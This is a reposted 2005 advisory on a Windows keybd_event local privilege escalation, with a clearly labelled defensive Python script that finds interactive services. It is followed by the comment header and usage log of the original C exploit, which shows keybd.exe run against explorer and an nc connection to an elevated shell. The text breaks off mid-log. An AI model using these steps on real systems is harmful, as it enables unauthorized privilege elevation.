Microsoft Windows "keybd_event" Local Privilege Escalation Exploit

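This article describes the Microsoft Windows keybd_event validation vulnerability. It is rated medium severity, affects Windows 2000/XP/2003, and has no fix available at present. By exploiting invalid keyboard input validation, an attacker can send shortcut keys to execute code, elevate privileges, and bypass security restrictions.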


Compiled by: 天天安全网   Author: Anonymous   Published: 2005-09-09

Vulnerability details: http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
Severity: Medium
Affected systems: Microsoft Windows 2000/XP/2003
Solution: No fix available at this time
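
One of the attack scenarios listed in the advisory below is a service allowed to interact with the desktop. The following audit sketch is an added example, not part of the original advisory or exploit: it finds such services by checking the Win32 `SERVICE_INTERACTIVE_PROCESS` bit (0x100) in each service's `Type` registry value. It assumes its input is the text output of `reg query HKLM\SYSTEM\CurrentControlSet\Services /s /v Type`; the sample data and service names are constructed.

```python
import re

# Win32 service-type bit meaning "may interact with the desktop".
SERVICE_INTERACTIVE_PROCESS = 0x100
BASE_TYPES = {0x1: "kernel driver", 0x2: "file system driver",
              0x10: "own process", 0x20: "shared process"}

SERVICE_KEY = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\]+)$", re.I)
TYPE_VALUE = re.compile(r"^\s+Type\s+REG_DWORD\s+(0x[0-9a-f]+)\s*$", re.I)

# Constructed sample; the service names are hypothetical.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleAgent
    Type    REG_DWORD    0x110

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleNet
    Type    REG_DWORD    0x20

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleNet\Parameters
    Type    REG_DWORD    0x100

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleTray
    Type    REG_DWORD    0x120

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleDisk
    Type    REG_DWORD    0x1
"""

def interactive_services(reg_output):
    """Return [(service, base type)] for services with the interactive bit set."""
    findings, current = [], None
    for line in reg_output.splitlines():
        if line.upper().startswith("HKEY_"):
            # Only direct children of ...\Services are services; a deeper key
            # resets the context so its values are not attributed to a service.
            key = SERVICE_KEY.match(line.strip())
            current = key.group(1) if key else None
            continue
        value = TYPE_VALUE.match(line)
        if value and current:
            svc_type = int(value.group(1), 16)
            if svc_type & SERVICE_INTERACTIVE_PROCESS:
                base = svc_type & ~SERVICE_INTERACTIVE_PROCESS
                findings.append((current, BASE_TYPES.get(base, hex(base))))
    return findings

if __name__ == "__main__":
    for name, base in interactive_services(SAMPLE):
        print(f"{name}: interactive service ({base})")
```

Services reported here share a desktop with the logged-on user and are candidates for having the interactive setting removed.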

------------------------------------------------------------------------------

/*
* Microsoft Windows keybd_event validation vulnerability.
* Local privilege elevation
*
* Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
* Iñaki Lopez ( ilo _@_ reversing.org <http://reversing.org> )
*
* Platforms affected/tested:
*
* - Windows 2000
* - Windows XP
* - Windows 2003
*
*
* Original Advisory: http://www.haxorcitos.com
* http://www.reversing.org
*
* Exploit Date: 08 / 06 / 2005
*
* Original Advisory:
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Attack Scenario:
*
* a) An attacker who gains access to an unprivileged shell/application executed
* with the application runas.
* b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
*
* Impact:
*
* Due to an invalid keyboard input validation, it's possible to send keys to any
* application of the Desktop.
* By sending some short-cut keys it's possible to execute code and elevate privileges,
* getting the logged-on user's privileges and bypassing the runas/service security restriction.
*
* Exploit usage:
*
* C:/>whoami
* AQUARIUS/Administrador
*
* C:/>runas /user:restricted cmd.exe
* Enter the password for restricted:
* Attempting to start cmd.exe as user "AQUARIUS/restricted" ...
*
*
* Microsoft Windows 2000 [Version.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:/WINNT/system32>cd /
*
* C:/>whoami
* AQUARIUS/restricted
*
* C:/>tlist.exe |find "explorer.exe"
* 1140 explorer.exe Program Manager
*
* C:/>c:/keybd.exe 1140
* HANDLE Found. Attacking =)
*
* C:/>nc localhost 65535
* Microsoft Windows 2000 [Versi
